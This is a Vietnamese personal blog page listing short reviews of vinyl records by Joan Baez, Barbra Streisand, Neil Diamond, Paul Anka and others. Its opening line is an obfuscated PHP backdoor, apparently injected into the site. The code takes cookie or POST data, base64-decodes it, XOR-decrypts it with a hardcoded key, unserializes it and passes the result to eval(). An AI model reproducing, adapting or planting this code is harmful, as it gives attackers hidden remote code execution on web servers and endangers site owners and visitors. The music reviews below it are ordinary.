$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Vinyl – Page 2 – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Category: Vinyl (page 2 of 7)

Gregory Simon ‎– Himalayan Afternoon

Cô nói là sẽ bay qua Nepal để leo lên Hy Mã Lạp Sơn, khi nào về cô sẽ kể anh nghe về chuyến đi. Anh biết cô đã phải gần mười năm, nhưng đến giờ mỗi lần nhìn cô vẫn thấy rất lạ, không hiểu sao trong con người với vóc dáng nhỏ bé ấy lại có khao khát được đi và chinh phục mãnh liệt thế.

Anyway, tình cờ trong đám record của anh có album này: Himalayan Afternoon (Gregory Simon). Giờ bên đó đang là buổi chiều, không biết cô đã bắt đầu leo núi chưa, anh bỏ record vào máy, nhìn bóng hắt trên tường và nghĩ lại chuyện xưa…

Joan Baez ‎– Farewell, Angelina

Farewell, Angelina là ca khúc được viết bởi Bob Dylan, vốn ban đầu cho album Bringing It All Back Home của ông, nhưng không hiểu sao chỉ sau một lần thu âm ông không thích nữa. Ca khúc này sau trở thành bài tủ của Joan Baez, và album này cũng là một trong những album hay nhất của bà.

Chuyện của Bob Dylan và Joan Baez cũng hay ho, ngồi lai rai chắc kể cũng được khá. Mà thôi, để sau.

Album này nhìn chung có nhiều ca khúc mà mình rất thích. Những ca khúc như It’s All Over Now, Baby Blue hay Daddy, You Been On My Mind, Colours đều hay không kém gì Farewell, Angelina dù có thể không nổi bằng. Giọng của Joan Baez như có một thứ ma lực cuốn hút người nghe đặt cả tâm hồn mình vào ca khúc…

Farewell, Angelina
The sky is on fire
And I must go.

Barbra Streisand ‎– The Broadway Album

Không quá khi nói The Broadway Album là album hay thuộc loại bậc nhất của Barbra Streisand, dù gia tài âm nhạc của cô có hằng hà vô số album đầy chất lượng. The Broadway Album đánh dấu sự kiện tài năng trẻ đầy triển vọng của sân khấu năm nào quay trở lại hát (tựa như) nhạc kịch.

Barbra Streisand khởi đầu sự nghiệp bằng việc trình diễn ở các show Nightclub và sân khấu kịch. Không quá đi sâu vào chi tiết, nhưng Streisand nhanh chóng trở thành một trong những ngôi sao trẻ đáng chú ý của sân khấu Broadway. Ở tuổi 20 mà thành công ở Broadway như thế đó không phải chuyện dễ dàng. Và như đã biết, sau đấy, Barbra chuyển sang lĩnh vực ca hát, trở thành một trong những danh ca có số lượng đĩa bán chạy nhất thời bấy giờ.

The Broadway Album thể hiện sự tự tin của Barbra khi cô trình bày những ca khúc đậm chất nhạc kịch rất khó, như If I Loved You trong Carousel, Adelaide’s Lamen trong Guys and Dolls hay Can’t Help Lovin’ That Man trong Showbat. Khó có thể chê trách gì ở Barbra trong những ca khúc này. Ngoài ra, cô còn nhờ được nhà soạn nhạc có tiếng ở Broadway là Stephen Sondheim đặt lời nhạc thêm cho các bài Putting It TogetherSend in The Clowns.

Album nghe rất rất tuyệt. Giọng cao vút và trong trẻo của Barbra hoà cùng dàn nhạc như đưa người nghe tới một thế giới sân khấu, và dưới bóng đèn hào hoa sáng rực nhưng lẻ loi, cô ca sĩ ấy cất tiếng để kể về những câu chuyện, vui có, hài hước có, lãng mạn và buồn đau thương cũng có…

Paul Anka ‎– Young, Alive And In Love!

Young, Alive And In Love! là album đầu tiên của Paul Anka khi ông về đầu quân cho RCA Victor – một hãng đĩa lớn mạnh và rất có tên tuổi. Có vẻ RCA kì vọng vào Paul Anka rất nhiều trong album này. Thời điểm đó, những tên tuổi như The Beatles, The Beach Boys hay Bob Dylan còn chưa thật sự nổi tiếng, Elvis Presley làm mưa làm gió các bảng xếp hạng với thể loại rock n roll pha blues nhẹ, dịu dàng và chậm rãi. Vì vậy, không ngạc nhiên lắm khi RCA Victor muốn Paul Anka ra một album theo-kiểu-như-thế. Vấn đề là Paul Anka trước đó chỉ như một thần tượng tuổi teen chơi thứ nhạc rock n roll đầy mạnh mẽ, chuyển hướng qua thể loại mà thị trường đang sốt: blues đòi hỏi phải có một giọng hát thật ấm và nam tính. Rất nhiều người nghĩ Paul Anka sẽ không làm được. Young, Alive And In Love! được kì vọng là câu trả lời thuyết phục cho những sự nghi ngờ thiếu tin tưởng đó.

Không khó để nghe ra âm hưởng của big band arrangement trong album. RCA Victor làm tốt ở mặt này. Ban nhạc chơi đằng sau Paul rất được. Tiếc là giọng của Paul không được như thế. Paul lên những note quan trọng không nổi, cảm giác chung nghe hơi thiếu chiều sâu. Album có concept rõ ràng, chia làm 3 phần, phần đầu các bài hát về tuổi trẻ (young), phần giữa về sự sống (alive), phần cuối là tình yêu (love), khá là thú vị.

Nhìn chung mình hơi cú vì tốn khá tiền mua record này mà không hay được như mong muốn, đành cho 3.5/5 vậy.

Neil Diamond – I’m Glad You’re Here With Me Tonight & You Don’t Bring Me Flowers

2 record của Neil Diamond ra khá gần nhau và mình cũng nghe cùng lúc nên review chung luôn vậy. Đây là album thứ 11 và thứ 12 trong sự nghiệp ca hát rất thành công của Neil Diamond. Khi này tên tuổi của Neil đang lên rất cao với hàng loạt concert cháy vé. Đây cũng là lúc ông có ý định lấn sân qua lĩnh vực điện ảnh. Album I’m Glad You’re Here With Me Tonight ra mắt cùng với bộ phim trùng tên, chủ yếu bao gồm nhiều phần trình diễn live và các cảnh hậu trường.

Ca khúc You Don’t Bring Me Flowers ban đầu được Neil viết cho show truyền hình All That Glitters và đóng vai trò ca khúc chủ đề của show. Tuy nhiên, sau này đạo diễn thay đổi cốt truyện khá nhiều khiến ca khúc này không còn hợp, Neil mới lấy lại, sửa thêm, tăng thời lượng từ 45 giây lên thành hơn 3 phút, thêm nhạc và thêm 1 verse khác dài hơn. Sau đấy, Neil trình bày lần đầu tiên solo trong album I’m Glad You’re Here With Me Tonight.

Barbra Streisand – một tên tuổi nổi tiếng khác trong thể loại nhạc Pop/ Adult Contemporary cũng cover ca khúc này và đưa vào album Songbird của bà phát hành ngay năm sau. Khi ấy, cả Barbra và Neil đều nhận ra tiềm năng của việc cả hai cùng trình bày ca khúc. Thế là, You Don’t Bring Me Flowers buồn man mác dưới giọng hát ngọt ngào và đầy tình tứ của Barbra Streisand và Neil Diamond trở thành một trong những ca khúc ăn khách nhất năm, đứng đầu bảng xếp hạng Billboard trong vài tuần liền. Nó thànhc ông đến mức Neil Diamond đưa hẳn ca khúc thành tên album kế tiếp của ông.

Nếu chỉ xét riêng một ca khúc đó, thì phần song ca của Barbra & Neil trong album You Don’t Bring Me Flowers nghe hay hơn hẳn I’m Glad You’re Here With Me Tonight, nhưng các ca khúc còn lại, theo mình, album I’m Glad You’re Here With Me Tonight nhỉnh hơn. Các ca khúc nghe sôi nổi và đầy tràn cảm xúc hơn so với album ra một năm sau này. Vì vậy nếu phải đánh giá, mình sẽ cho cả 2 album cùng số điểm 4/5, mình thích album đầu hơn, nhưng ca khúc thích nhất thì lại là bản song ca trong album sau.

 

Margo Smith – Don’t Break The Heart That Loves You

Don’t Break The Heart That Loves You là ca khúc được sáng tác bởi Benny Davis và Ted Murry. Đã từng có 2 phiên bản cover rất thành công của ca khúc này, một của Connie Francis theo thể loại pop vào năm 1962, một của Margo Smith theo thể loại country vào gần cuối thập niên 70. Đã từng nghe cả 2, mình thích bản của Margo Smith hơn. Ca khúc này cũng là tên của album duy nhất của Margo Smith mà mình có.

Nhìn chung, album này ngoài ca khúc đã nói ở trên, cùng It Only Hurts a Little While, còn lại không có gì nổi bật lắm. Don’t Break The Heart That Loves You ở giữa bài có tiếng kèn saxophone, tạo nên một không khí khá buồn và là lạ cho bài hát. Ngoài điểm đó, các ca khúc còn lại đúng như những bài nhạc country truyền thống: tiếng đàn dây nhẹ nhàng, giai điệu tươi sáng.

Một album mà mình chỉ nghe thấy được 1 bài hay, 1 bài ổn ổn thế nên mình đánh giá 3/5 vậy.

Al Martino – Daddy’s Little Girl

Al Martino là một ca sĩ khá có tiếng trong những năm 50, 60. Tuy nhiên, ông được biết đến nhiều hơn qua vai diễn Johnny Fontane trong bộ phim Bố Già kinh điển. Ông cũng là một trong những nam ca sĩ thành công nhất trong cộng đồng người Mỹ gốc Ý.

Record này mình mua chỉ bởi vì cái tên: Daddy’s Little Girl. Và quả thật nó không làm mình thất vọng. Bài hát chính cùng tên của album nghe rất cảm động, thấm đẫm tình cha con. Các bài hát khác trong album cũng là những bài pop hết sức dễ nghe. Nhìn chung, Daddy’s Little Girl có chất nhạc rất đặc trưng của những album thập niên 60, khi mà các bài hát với lời cực kì lãng mạn được cất lên trên nền nhạc chậm rãi mang âm hưởng của jazz.

Những record như thế này rất hợp để nghe sau một ngày làm việc uể oải và mệt nhọc. Cảm giác thư thái nó mang lại khiến mình khá thích. 4/5 cho record này.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.